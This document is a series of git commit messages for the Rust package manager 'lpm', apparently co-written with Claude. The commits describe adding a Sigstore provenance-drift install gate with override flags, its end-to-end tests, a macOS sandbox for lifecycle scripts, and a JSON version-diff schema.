  .clone())`. This closes the round-trip: install-time snapshot →
  `BlockedPackage.provenance_at_capture` → binding's
  `provenance_at_approval` → subsequent install's drift check.

Producer fix (build_state):

* `BlockedSetMetadataEntry` extended with
  `provenance_at_capture: Option<ProvenanceSnapshot>`.
* `compute_blocked_packages_with_metadata` at build_state.rs:432
  now pulls the snapshot from metadata instead of hardcoding
  `None` — fixes the reviewer-flagged producer-side underfill where
  non-drifting packages had no approval-time reference. Every
  blocked package now carries the capture regardless of whether
  its drift check fired.

Install-gate wiring (install.rs):

* New drift-gate block immediately after the P3 cooldown gate,
  gated on `!used_lockfile` (fresh-resolution only; lockfile fast-
  path skips by design — `lpm.lock` locks integrity, not attestation
  identity). `--allow-new` does NOT bypass per D16.
* Short-circuits with zero network cost when the project has no
  rich `trustedDependencies` entries with provenance (pre-P4
  projects, or no approvals at all).
* For each resolved package with a provenance-bearing prior
  approval: extract `DistInfo.attestations` from the resolver's
  TTL cache, fetch the candidate snapshot via Chunk 2's
  `provenance_fetch::fetch_provenance_snapshot`, compare via the
  lpm-security comparator, collect drift offenders.
* `§7.3` UX on block: per-package "@Version — <kind>" lines with
  "last approved: v<VERSION> via <publisher> / <workflow>" and the
  "axios 1.14.1 compromise (March 2026)" footer. Error message
  suggests `lpm approve-builds` to acknowledge the new identity
  (Chunk 4 adds `--ignore-provenance-drift` override flags).
* `build_blocked_set_metadata` at install.rs:2865 extended to also
  fetch provenance per package — this is what populates
  `BlockedSetMetadataEntry.provenance_at_capture` and closes the
  approval-round-trip. Graceful degradation: if `LpmRoot::from_env()`
  fails (HOME unset), the function's "never returns an error"
  contract is preserved and `provenance_at_capture` is `None` for
  every package.

Chunk 2 scaffold removal:

* `#![allow(dead_code)]` on `provenance_fetch` module removed. The
  install-gate call site + `build_blocked_set_metadata` both
  consume the module's public API, so all 17 items are reachable
  from the binary target and clippy is clean without the scaffold.

Test coverage (3986 workspace tests, all pass):

* 11 new `lpm-security::provenance::tests` covering the §7.2 match
  table + degraded-vs-confirmed-absent regression guard.
* Existing `lpm-cli` `provenance_fetch` tests (32) + `lpm-workspace`
  schema tests (9) still pass unchanged — the scaffold removal and
  the helper additions are non-breaking.
* Forward-compat: the one `BlockedSetMetadataEntry` test-helper
  construction site (build_state.rs:1519) uses `..Default::default()`
  so future P4 fields don't force test re-edits.

CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast` — 3986/3986 pass, zero flakes (full
  `lpm-task perf_eval_*` family clean).

Chunk 4 follows with override flags (`--ignore-provenance-drift[-all]`)
+ global-install rejection; Chunk 5 lands the E2E wiremock suite
covering the §11 P4 ship criteria.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…ference selector

Two reviewer-flagged defects in 917239c, both now corrected with
dedicated regression guards.

## Finding 1 (critical) — drift comparator flagged legitimate releases

The Chunk 3 comparator compared snapshots via full-struct `==`, which
treated the per-release ref (`refs/tags/v1.14.0` vs `v1.14.1`) and
the per-signing Fulcio leaf cert SHA as part of the identity tuple.
Every legitimate patch bump from the same repo + workflow would have
been classified `IdentityChanged` and hard-blocked.

Fix is a schema split + comparator rewrite:

* `ProvenanceSnapshot.workflow: Option<String>` → two fields:
  * `workflow_path: Option<String>` — `.github/workflows/publish.yml`.
    Stable across releases from the same workflow. Part of the
    drift-check identity tuple.
  * `workflow_ref: Option<String>` — `refs/tags/v1.14.0`. Varies per
    release. Retained for audit / UX ("last approved: v1.14.0 via
    <id> (ref: refs/tags/v1.14.0)") but NOT part of identity.
* `attestation_cert_sha256` similarly excluded from identity (Fulcio
  rotates the leaf per signing). Retained for audit.
* `parse_github_actions_uri` now splits `<path>@<ref>` at the last
  `@` and prepends `.github/workflows/` so `workflow_path` is the
  full canonical path (matches §6.1 wire spec).
* `lpm-security::provenance::check_provenance_drift` gains an
  internal `identity_equal(a, n)` helper that compares ONLY
  `(present, publisher, workflow_path)`, replacing the full-struct
  `==` in the "exact match" arm.

Regression guards (3 new, both layers):

* `provenance_fetch::tests::parse_uri_release_bump_changes_ref_but_not_path`
  — v1.14.0 vs v1.14.1 URIs produce the SAME workflow_path and
  DIFFERENT workflow_ref. Parser-level proof.
* `lpm_security::provenance::tests::no_drift_when_only_workflow_ref_differs_between_releases`
  — the primary comparator regression guard. axios v1.14.0 vs
  v1.14.1 with different refs AND different cert SHAs → NoDrift.
* `lpm_security::provenance::tests::no_drift_when_only_cert_sha_differs_across_rotations`
  — secondary guard: identical publisher + workflow_path +
  workflow_ref but different cert SHA → NoDrift. Covers the case
  where the same workflow re-signs (e.g., a republish) without a
  tag change.

Updated tests (schema broadening, not semantic change):

* `identity_changed_when_only_workflow_differs` renamed to
  `identity_changed_when_workflow_path_differs` — same repo, same
  release tag, DIFFERENT workflow file (e.g., a PR-triggered
  workflow impersonating the main publish path). `workflow_path` IS
  part of the identity tuple; this remains `IdentityChanged`.
* `identity_changed_when_only_cert_sha_differs` deleted — the old
  assertion was the exact behavior we're fixing. The new
  `no_drift_when_only_cert_sha_differs_across_rotations` test
  encodes the correct post-fix behavior.

## Finding 2 (medium) — non-deterministic reference selector

`provenance_reference_for_name` used `map.iter().find_map(...)` over
a `HashMap`, whose iteration order isn't stable. Impact: the
"last approved: vX" UX line could show different versions across
runs, and when multiple provenance-bearing approvals for the same
package name carried DIFFERENT identities (legitimate publisher
migration, or prior attack + cleanup), the drift VERDICT itself
could flip between runs.

Fix: collect matching entries, pick the lexicographic-max version
string via `max_by(|(v1, _), (v2, _)| v1.cmp(v2))`. Deterministic;
approximates "latest semver" for consistent-digit-width components.
Documented simplification — a future phase can tighten to full
semver ordering, but Chunk 3's obligation is determinism first.

7 new selector tests in `lpm-workspace`:

* `provenance_reference_returns_none_for_legacy_variant`
* `provenance_reference_returns_none_for_absent_name`
* `provenance_reference_returns_none_when_no_entries_have_provenance`
* `provenance_reference_returns_single_provenance_bearing_entry`
* `provenance_reference_filters_out_legacy_entries_in_mixed_map` —
  safeguards the Finding-1-related behavior where a legacy binding
  without provenance must NOT mask a newer provenance-bearing one.
* `provenance_reference_picks_lex_max_version_deterministically` —
  primary regression guard. Constructs a 3-entry map with distinct
  identities and runs the selector 8 times to exercise
  HashMap-hash-state variability; must always pick `2.0.0`.
* `provenance_reference_handles_scoped_name_correctly` — scoped
  package names like `@scope/pkg@1.0.0` must split at the LAST `@`,
  not the leading scope `@`.

## Ancillary updates

* `ProvenanceSnapshot` now derives `Default` so construction sites
  that only set `present` (e.g., `..Default::default()`) stay
  forward-compat across future field additions.
* Schema tests in `lpm-workspace` renamed from
  `provenance_snapshot_equality_is_tuple_strict` to
  `provenance_snapshot_full_equality_is_tuple_strict` with a
  docstring clarifying that full-struct equality is used for cache
  round-trip verification, NOT the drift identity tuple. Prevents
  future confusion between schema-level `==` and comparator-level
  `identity_equal`.
* `install.rs` drift-gate UX renders the identity as
  `<publisher> / <workflow_path>` plus a trailing `(ref: <ref>)`
  hint so reviewers can temporally place the approval without
  confusing the ref with identity.
* `build_state.rs` + `lpm-cli/src/provenance_fetch.rs` construction
  sites updated to the new field names.

CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast` — 3995/3995 pass, zero flakes. Focused
  provenance suite: 61/61 (+9 from the two fix groups).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…s + -g rejection

Wires the Phase 46 P4 provenance-drift override flags end-to-end and
extends the P3 global-install-rejection pattern to cover them.

## CLI surface

Two new clap args on `Commands::Install` (see `main.rs:218-246`):

* `--ignore-provenance-drift <PKG>` — repeatable; opts out of the
  drift check for one package name while keeping every other
  package's drift check live.
* `--ignore-provenance-drift-all` — blanket opt-out for this
  invocation.

Per Q2 of the P4 kickoff discussion, the two flags COMPOSE rather
than being mutually exclusive: `--ignore-provenance-drift-all`
supersedes the per-package list. No clap mutex — an orchestrator
forwarding both from higher-level config doesn't trip CI. The
precedence collapses inside `DriftIgnorePolicy::from_cli`.

## Canonical policy type

New `DriftIgnorePolicy` enum in `provenance_fetch.rs`:

```
pub enum DriftIgnorePolicy {
    EnforceAll,                    // default: no override
    IgnoreNames(HashSet<String>),  // per-package opt-out
    IgnoreAll,                     // blanket opt-out
}
```

* `Default` → `EnforceAll` (derive via `#[default]`), so every
  non-Install caller (add/upgrade/migrate/run/dev/deploy/doctor/
  install_global/update_global) defaults to enforcing drift by
  passing `DriftIgnorePolicy::default()`.
* `.ignores_all()` — drift gate short-circuits the whole `if
  !used_lockfile` block when true (zero network cost).
* `.ignores_name(&str)` — per-package consultation inside the gate.

Canonicalization tests:

* `drift_ignore_policy_no_flags_enforces_all` — baseline.
* `drift_ignore_policy_per_package_collapses_into_set` — happy path
  for the repeatable flag.
* `drift_ignore_policy_all_flag_alone_ignores_all` — blanket path.
* `drift_ignore_policy_all_flag_supersedes_per_package_list` — Q2
  regression guard: `-all` + `<pkg>` list → blanket, not error.
* `drift_ignore_policy_empty_inputs_canonicalize_to_enforce_all` —
  avoids an empty-set `IgnoreNames` that would semantically match
  `EnforceAll` but obscure the signal in debug output.

## Install-gate wiring (install.rs:1718-1755)

The drift gate now consults the policy in two places:

1. **Short-circuit** before the trusted-dependencies read when
   `.ignores_all()` is true. Emits a single advisory to stderr
   ("provenance-drift check waived by --ignore-provenance-drift-all")
   so the opt-out is visible in the install log — silent skip
   would hide that the user accepted a non-zero-risk identity.
2. **Per-package** inside the drift loop: before fetching the
   candidate's attestation, check `.ignores_name(&p.name)` and emit
   a per-package advisory ("X@Y — provenance-drift check waived by
   --ignore-provenance-drift (approved reference: vZ)") before
   `continue`-ing past the fetch. Skipping the fetch matters for
   offline / intermittent-network installs where a waived package
   wouldn't benefit from a pointless round-trip.

Footer UX extended to enumerate all three recovery paths in
narrowest-to-broadest order: re-approve via `lpm approve-builds`,
`--ignore-provenance-drift <pkg>`, `--ignore-provenance-drift-all`.
Error message's hint updated accordingly.

## Fan-out through the install pipeline

`run_with_options` / `run_add_packages` / `run_install_filtered_add`
all grow `drift_ignore_policy: DriftIgnorePolicy` at end of signature.
`run_install_filtered_add` clones the policy per targeted member in
the multi-member loop (cheap — enum + small HashSet) because each
iteration consumes the policy when calling into `run_with_options`.

Nine non-Install callers pass `DriftIgnorePolicy::default()` with
a one-line comment explaining why. Two test call sites for
`run_install_filtered_add` updated identically.

## Global-install rejection (main.rs:1576)

`validate_global_install_project_scoped_flags` gains two new
parameters mirroring the P3 `--min-release-age` rejection pattern:

```
ignore_provenance_drift: &[String],
ignore_provenance_drift_all: bool,
```

Non-empty list OR `ignore_all = true` on the `-g` path fails with:

> `--ignore-provenance-drift` / `--ignore-provenance-drift-all`
> are not supported on `lpm install -g` in Phase 46 P4 (global
> trust store is tracked for Phase 46.1). Drop the flag for
> global installs.

D13/D19 rationale: the global trust store is a separate schema
(`lpm-global/src/trusted_deps.rs`, §3.9 in the plan) that doesn't
carry `provenance_at_approval`, so the override flags have no
semantic target on the `-g` path. Reject explicitly rather than
silently drop — same safety argument the P3 reviewer made for the
cooldown flag.

Two new rejection regression tests:

* `install_global_rejects_ignore_provenance_drift_flag` — covers
  the repeatable per-package variant (tests with two `<pkg>`
  arguments).
* `install_global_rejects_ignore_provenance_drift_all_flag` —
  covers the blanket variant.

Existing `install_global_rejects_project_scoped_yes_flag` +
`install_global_rejects_min_release_age_flag` tests updated to
pass the two new validator args (empty list + false).

## Behavioural verification

* `lpm-rs install --help` — both flags documented with full rationale.
* `lpm-rs install -g eslint --ignore-provenance-drift axios` → exit
  1, error names the flag + Phase 46.1.
* `lpm-rs install -g eslint --ignore-provenance-drift-all` → exit
  1, same rejection shape.

## CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`)

* `cargo clippy --workspace -- -D warnings` — clean (with two
  `#[allow]` pragmas explained below).
* `cargo fmt --check` — clean.
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches.
* `cargo build --workspace` — clean.
* `cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast` — **4002/4002 pass**, zero flakes.

## Lint pragmas added

* `#[allow(clippy::too_many_arguments)]` on
  `validate_global_install_project_scoped_flags` — 8 args is above
  the clippy threshold but every argument is a distinct flag
  surface that belongs on the validator; packaging them into a
  struct would add ceremony without improving callsite clarity
  (the two test callers already pass them individually for test
  documentation).
* `DriftIgnorePolicy` derives `Default` via `#[default]` on the
  `EnforceAll` variant (was a manual impl; clippy's
  `derivable_impls` caught it).

Chunk 5 follows with the wiremock E2E suite covering the §11 P4
ship criteria + these override flags end-to-end.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
End-to-end coverage for the Phase 46 P4 drift gate + override
flags, exercising the full `lpm install` pipeline against a
wiremock-backed registry that serves BOTH the package metadata
(with `dist.attestations.url`) AND the attestation bundle itself.
Harness pattern mirrors `release_age_p3_ship_criteria.rs` with two
new pieces: (a) the bundle endpoint serves a synthetic Sigstore
bundle whose leaf cert carries a deterministic GitHub Actions OIDC
SAN URI (generated via rcgen per test), (b) the project manifest's
`trustedDependencies` map carries a populated
`provenanceAtApproval` so the drift gate has a reference to
compare against.

## §11 P4 ship criteria covered

1. **`attestation_deleted_between_approved_and_candidate_blocks`** —
   the axios 1.14.1 scenario end-to-end. Approved v1.0.0 has
   provenance; registry serves v1.0.1 with NO `dist.attestations`.
   Install blocks with "provenance dropped" verdict.
2. **`ignore_provenance_drift_per_package_unblocks`** — same
   fixture plus `--ignore-provenance-drift @lpm.dev/acme.widget`.
   Drift block suppressed AND the waiver-advisory line appears
   (the opt-out is audit-visible, not silent).
3. **`ignore_provenance_drift_all_unblocks`** — blanket waiver
   fires at the zero-cost short-circuit; the
   "waived for this install by --ignore-provenance-drift-all"
   advisory appears before the per-package loop would have.
4. **`identity_changed_between_approved_and_candidate_blocks`** —
   both versions carry attestations but the publisher differs
   ("repo moved to attacker fork" scenario). Verdict:
   "publisher identity changed".

## Reviewer-flagged regression guards

5. **`legitimate_release_bump_does_not_drift`** — Finding-1 E2E
   guard. v1.0.0 → v1.0.1 from the same publisher + same workflow
   file necessarily differs on `workflow_ref` AND
   `attestation_cert_sha256` (Fulcio's per-signing leaf). Identity-
   tuple equality excludes both; install proceeds. If this test
   ever regresses, every legitimate patch bump would hard-block —
   catastrophic for gate usability. Guards eec6312's comparator
   fix.
6. **`allow_new_alone_does_not_bypass_drift`** — D16 orthogonality
   guard. Approved-present + candidate-absent scenario with just
   `--allow-new` passed. P3 cooldown override MUST NOT bypass P4
   drift: the two gates are orthogonal and their overrides are
   scoped independently. Regression here would silently merge the
   two gates and break the reviewer-surfaced "cooldown and
   provenance are orthogonal signals" contract.

## Reliability guard

7. **`degraded_fetch_does_not_falsely_block`** — attestation URL
   returns HTTP 500. Fetcher degrades to `Ok(None)` per the P4
   offline-mode contract; comparator returns `NoDrift`; install
   proceeds. A Sigstore rate-limit or transient network error
   must NEVER produce a spurious drift block — this test guards
   the `(Some(_), None) → NoDrift` branch in
   `check_provenance_drift`.

## Zero-cost short-circuit guard

8. **`project_with_no_approvals_skips_drift_gate`** — a project
   without any rich `trustedDependencies` entries must skip the
   gate entirely: no `LpmRoot::from_env()` call, no
   `reqwest::Client` construction, no per-package iteration. The
   `-all` waive advisory must NOT fire (user didn't pass it).
   Guards the Chunk 3 `has_rich_approvals` optimization.

## Harness structure

Shared fixtures (~250 LOC) + 8 focused tests (~150 LOC). Two
parameterized enums (`AttestationShape` / `AttestationResponse`)
drive the registry's response shape, so each test describes its
scenario in 3-4 lines. rcgen generates an ephemeral cert per
test — the SHA rotates as it would in production, proving the
comparator doesn't accidentally depend on cert-SHA equality.

## CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`)

* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast` — **4010/4010 pass**, zero flakes. New E2E
  suite: 8/8 pass in 1.74s total (each test ~1.7s for
  subprocess + mock-server spinup).

## P4 status after this chunk

The P4 client-side work is feature-complete. Remaining for
ship-complete: the separate server-side registry PR that adds
`dist.signatures` + `dist.attestations` to the LPM registry's
package-metadata response (§11 P4 parallel track, out of this
branch's scope). Until that lands, LPM-registry packages will
degrade to "unknown attestation" per the Ok(None) contract — the
drift gate is still active for npm-hosted packages that already
serve `dist.attestations`.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…rt-circuit naming

Two reviewer-flagged harness-strength defects in 30ae5f9, both
addressed with stronger assertions or more modest claims — not
production-code changes.

## Finding 1 — unblocked tests overclaimed "install proceeds"

The shared `assert_drift_not_blocked` helper only checked for
absence of the drift-block message. Five tests
(`ignore_provenance_drift_per_package_unblocks`,
`ignore_provenance_drift_all_unblocks`,
`legitimate_release_bump_does_not_drift`,
`degraded_fetch_does_not_falsely_block`, and the renamed
no-approvals test) claimed "install proceeds" / "install
unblocks" but would pass equally well if the subprocess exited
non-zero for some unrelated reason (e.g., a regression in a
downstream pipeline stage that leaves the drift message absent).

Fix: new helper `assert_drift_not_blocked_and_install_succeeded`
that composes three checks:

1. The drift-block message is absent (unchanged).
2. `status.success()` — exit 0 proves the subprocess didn't fail
   for any reason.
3. A post-link completion marker appears in the output
   (`"linked"` on the human path OR `"success":true` on the JSON
   path). Proves the pipeline actually reached stages AFTER the
   drift gate fires — the gate fires BEFORE fetch/link, so a
   completion marker is upstream-reliable evidence of forward
   progress, not merely "the drift branch didn't emit its
   block message."

All five unblocked tests switched to the stronger helper. All 8
still pass (1.7 s each; 8 tests in 1.8 s total wall time).

## Finding 2 — "skips drift gate" test didn't actually verify the skip

`project_with_no_approvals_skips_drift_gate` claimed to guard the
Chunk 3 `has_rich_approvals` short-circuit optimization in
`install.rs`. But that optimization is a pure internal performance
fast-path: the alternative (gate enters, iterates packages, each
returns `None` from `provenance_reference_for_name`, no fetch
fires) produces the exact same external behavior. A runtime
subprocess test cannot distinguish "fast path taken" from "slow
path with no matches" without instrumentation (e.g., a `tracing`
debug marker + log-capturing harness).

Fix: rename the test to
`project_with_no_approvals_does_not_block_on_drift` — what the
assertions ACTUALLY prove. Updated the docstring to explain the
previous overclaim, note that verifying the specific optimization
is deferred to a future tracing-based harness, and document the
observable contract this test now guards (no block + no blanket-
waive advisory + install completes end-to-end).

The test body itself now also uses the stronger
`assert_drift_not_blocked_and_install_succeeded` helper, so it
catches the Finding-1-class regression simultaneously.

## Top-of-file coverage comment updated

The module docstring's test list was missing item 8 (the no-
approvals case) and didn't describe the new "strong unblocked
assertion" shape. Both added so the file reads coherently.

## CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`)

* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast` — **4010/4010 pass**, zero flakes.
* Focused suite:
  `cargo nextest run -p lpm-cli --test provenance_drift_p4_ship_criteria`
  — 8/8 pass under the tighter assertions.

Production code from Chunks 1-4 is unchanged. The blocker was
strictly in the ship-criteria test harness layer.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Introduces crates/lpm-sandbox with the public API that Chunks 2-6 build
on without touching the call site in build.rs. No wiring yet: scripts
still run exactly as they do on main, since nothing constructs a
Sandbox outside the crate's own tests. Scaffolds:

- SandboxSpec: package + project + host path set the platform backend
  needs to synthesize its profile, plus extra_write_dirs for the
  package.json > lpm > scripts > sandboxWriteDirs escape hatch (§9.6).
  All paths must be absolute; validate_spec enforces before construction.
- SandboxMode: Enforce (default), LogOnly (diagnostic, explicitly
  non-authoritative per Chunk 4 signoff), Disabled (--unsafe-full-env
  --no-sandbox). Disabled always works — the escape hatch is reachable
  from every platform including Windows.
- SandboxedCommand + SandboxStdio: platform-neutral process description
  so backends own the OS-level Command (macOS rewrites the program to
  sandbox-exec; Linux installs pre_exec). Callers never touch
  std::process::Command directly.
- Sandbox trait: spawn() + backend_name() + mode(). Object-safe, so
  callers hold Box<dyn Sandbox>.
- SandboxError: structured variants (UnsupportedPlatform, KernelTooOld,
  ProfileRenderFailed, SpawnFailed, InvalidSpec) each carry a
  user-facing remediation field — §12.5's escape-corpus tests in
  Chunk 5 assert against these.
- unsupported_remediation(): single source of truth for the
  "sandbox unavailable on windows — Phase 46.1 …" string Chunk 4
  surfaces at the CLI layer, so the doc reference and CLI surface
  stay in sync.
- NoopSandbox: real functional backend for SandboxMode::Disabled. Runs
  the command with no containment; everywhere. This is the only
  non-stub impl in Chunk 1.
- macos.rs + linux.rs: cfg-gated backend stubs per CLAUDE.md
  cross-platform hygiene rule. Both construct successfully so the
  factory contract is stable across chunks; spawn() returns
  ProfileRenderFailed naming the Chunk that wires the real impl.
  Avoids silent no-op containment on platforms that should have it.
- Factory dispatch via platform_backend(): each arm is a fully cfg-gated
  free function, so unsupported platforms don't compile dead code from
  supported arms (CLAUDE.md ungated-platform-code rule).

Chunk 1 ship criteria:
- Crate compiles workspace-wide clippy-clean on macOS (host) and Linux
  (CI will confirm). ✓ cargo clippy --workspace -- -D warnings clean.
- Unit tests cover SandboxSpec construction, SandboxMode properties,
  SandboxedCommand builder, every SandboxError variant's Display
  (including token-level assertions the Chunk 5 corpus will reuse),
  validate_spec's invariants, factory dispatch per mode + per
  platform, and NoopSandbox end-to-end with a trivial command.
  22/22 pass.
- No wiring into execute_script — build.rs unchanged. ✓

Gate status (CARGO_TARGET_DIR=/tmp/lpm-rs-phase46-p5-target):
- cargo clippy --workspace -- -D warnings: clean
- cargo fmt --check: clean
- grep -r fancy-regex crates/*/Cargo.toml: absent
- cargo build --workspace: clean
- cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast: 4031 passed, 1 flake in
  lpm-task::perf_eval_glob_200_members_under_500us_per_call (passes
  isolated in 0.134s — pre-existing brittleness of the 500µs
  perf assertion under heavy parallel load; not introduced by this
  change).
- cargo test -p lpm-auth x3: 47/47 deterministic under parallel test
  runner.

Branch: phase-46-p5, cut from phase-46 at 7153e59 per signoff
(P4 stays unmerged from main; P5 builds on phase-46).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Replaces build.rs's direct `Command::new("sh")` spawn on macOS with a
sandbox-exec-wrapped spawn routed through lpm_sandbox. Ship criteria
#1 (deny reads + writes outside allow list) and #2 (benign postinstall
succeeds) covered by unit tests that actually shell out to
sandbox-exec on the host. Linux stays on the Chunk 1 stub + cfg-forked
legacy path in build.rs until Chunk 3 lands landlock; non-macOS
platforms observe zero behavior change from this chunk.

SandboxMode is computed at the build call site (not encoded in
ScriptPolicyConfig) per the Chunk 2 signoff:
- default → SandboxMode::Enforce
- `--unsafe-full-env --no-sandbox` → SandboxMode::Disabled (escape
  hatch; emits a loud warning banner at the call site)
- `--sandbox-log` → SandboxMode::LogOnly (strictly diagnostic —
  banner explicitly tells the user a clean run is NOT a safety
  signal; Chunk 4 lands the real non-enforcing backend)

`--no-sandbox` requires `--unsafe-full-env` (clap-level `requires`
attribute; using `--no-sandbox` alone errors out). `--no-sandbox`
and `--sandbox-log` are mutually exclusive (clap `conflicts_with`).
Auto-build inside `lpm install` hardcodes both to `false` — autoBuild
never bypasses containment (D20).

Sandbox crate additions:
- seatbelt.rs: renders the §9.3 Seatbelt profile per-package with
  `{package_dir}/{project_dir}/{home}/{tmpdir}` interpolation.
  Writable set stays narrow (§9.3 verbatim: package dir + node_modules
  + .husky + .lpm + ~/.cache + ~/.node-gyp + ~/.npm + /tmp + $TMPDIR
  + sandboxWriteDirs extras). Read set widens past the schematic §9.3
  layout with the system primitives real macOS binaries need to load:
  stat-the-root literal `/`, /bin + /sbin for coreutils, /System (not
  just /System/Library) for dyld shared cache, /private/etc for
  libc / resolver, /private/var/db/dyld for the shared cache, /dev
  (read-only) for /dev/fd + stdin + stdout + stderr + tty + urandom.
  Process primitives: `(allow process*)`, `(allow signal)`,
  `(allow mach-lookup)`, `(allow sysctl-read)`, `(allow iokit-open)`
  — all confirmed empirically necessary (deny-default blocks even
  /usr/bin/true without them on recent macOS releases). Network stays
  on per D3.
- config.rs: `load_sandbox_write_dirs` — the one place that reads
  package.json > lpm > scripts > sandboxWriteDirs. Relative paths
  resolve against project_dir; empty strings rejected (would widen
  writes to whole project); non-array / non-string entries surface
  as SandboxError::InvalidSpec with an actionable path to fix.
- macos.rs: SeatbeltSandbox replaces the Chunk 1 stub. `new()` renders
  the profile up front (so render errors surface at construction,
  not mid-spawn). `spawn()` prepends `sandbox-exec -p <profile>` to
  the program+args, applies envs/cwd/stdio from the SandboxedCommand,
  and sets process_group(0) on unix for kill-tree-on-timeout parity
  with the pre-Phase-46 path. NoopSandbox now also sets
  process_group(0) on unix so `--no-sandbox` is observably identical
  to the legacy direct-spawn.

build.rs integration:
- `run` grows `no_sandbox` + `sandbox_log` params.
- Before the script loop: compute SandboxMode, emit the appropriate
  warning banner, load `extra_write_dirs` once, derive `store_root`
  from LpmRoot, derive `home_dir` from `dirs::home_dir()`, derive
  `tmpdir` from `$TMPDIR` or `/tmp`.
- `execute_script` grows pkg_name/pkg_version/sandbox_mode/
  extra_write_dirs/store_root/home_dir/tmpdir params. Env-building
  (INIT_CWD + augmented PATH) is platform-neutral and happens once
  per call. The spawn step is the ONE cfg-fork point:
  `spawn_lifecycle_child` on macOS routes through
  `lpm_sandbox::new_for_platform`; on non-macOS it runs the legacy
  direct-Command path. Chunk 3 deletes the non-macOS arm.

Adjacent fix: two pre-existing `assert_eq!(x, false)` lints in
build_state.rs that clippy --all-targets surfaces on this base.
Caught because `--all-targets` wasn't on the current CI invocation;
flagged in gate summary so the crew is aware the guard is partial.

Gate status (macOS host, CARGO_TARGET_DIR=/tmp/lpm-rs-phase46-p5-target):
- cargo clippy --workspace -- -D warnings: clean
- cargo clippy --workspace --all-targets -- -D warnings: clean (after
  fixing the two pre-existing build_state.rs asserts)
- cargo fmt --check: clean
- grep -r fancy-regex crates/*/Cargo.toml: absent
- cargo build --workspace: clean
- cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast: 4061 passed, 1 flake (same lpm-task::perf_eval
  under-load flake as Chunk 1 — passes isolated in 0.159s, pre-existing
  500µs perf-assertion brittleness)
- cargo test -p lpm-auth x3: 47/47 deterministic
- lpm-sandbox crate: 52/52 (13 new seatbelt profile tests, 10 new
  config tests, 4 new macos integration tests that shell out to
  sandbox-exec for real containment probes, plus the 22 lib tests
  inherited from Chunk 1 with the Linux-stub assertion updated)

Ship criteria for Chunk 2:
- ✓ §11 P5 criterion #1: a forbidden-read and a forbidden-write both
  fail on macOS (macos::tests::enforces_deny_default_for_forbidden_read
  + denies_write_outside_allow_list_under_enforce).
- ✓ §11 P5 criterion #2: a benign write into the package's own store
  dir succeeds on macOS (macos::tests::
  allows_write_into_package_dir_under_enforce +
  spawns_a_trivial_benign_command_inside_its_own_package_dir).
- ✓ Linux path unchanged from pre-Phase-46 (cfg-forked legacy
  Command::new path; Linux stub still returns ProfileRenderFailed
  from Sandbox::spawn — guarded by linux_backend_is_still_stub_in_chunk2).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin and others added 16 commits April 22, 2026 17:39
…rsion_diff)

C4 surfaces the version-diff data on the machine channel so agents
driving `lpm approve-builds` and `lpm install --json` can route by
drift dimension without re-classifying. Bumps `SCHEMA_VERSION 2 → 3`
and consolidates the per-blocked-entry JSON shape onto a single
shared helper so the install pipeline and the approve-builds command
cannot drift on the wire.

## Wire shape — version_diff (per blocked entry)

Stable contract: every `version_diff` object emits the SAME keys with
`null` for dimensions that didn't drift, so agents read with uniform
key access.

```json
"version_diff": {
  "prior_version": "1.14.0",
  "candidate_version": "1.14.1",
  "reason": "provenance-drift",         // kebab-case wire form
  "script_hash_drift": false,           // always bool
  "behavioral_tags_added": null,        // [...] when drifted, null otherwise
  "behavioral_tags_removed": null,
  "provenance_drift_kind": "dropped"    // "identity-changed" | "dropped" | "gained" | null
}
```

`version_diff` itself is `null` when no prior approved binding exists
for the package name (first-time review). When a prior exists, the
object emits even for `reason: "no-change"` so agents can
distinguish "we found the prior at v1.14.0 and it matches" from "no
prior to compare." Same semantic as the C3 TUI: the diff is a
positive equality assertion, not the absence of comparison.

Reason wire forms (kebab-case to match `static_tier`'s convention):
- `no-change` — every dimension we can compare matches.
- `script_hash_drift` — only the script hash drifted.
- `behavioral_tag_shift` — only the behavioral-tag set drifted.
- `provenance-drift` — only the provenance identity tuple drifted.
- `multi-field-drift` — two or more dimensions drifted simultaneously.

`behavioral_tags_added: []` (vs. `null`) is semantically meaningful:
empty array means "tag dimension drifted, with only LOST changes";
null means "tag dimension didn't drift in this case." Both
preserved across the BehavioralTagShift and MultiFieldDrift variants.

## Consolidated entry helper

Pre-Chunk-4: per-entry shape was an inline `serde_json::json!{...}`
literal in three places (approve_builds.rs `blocked_to_json`, two
sites in install.rs). Chunk 4 moves the canonical shape into a
single `version_diff::blocked_to_json(blocked, &trusted)` and
delegates from each call site:

- approve_builds.rs's existing private `blocked_to_json` becomes a
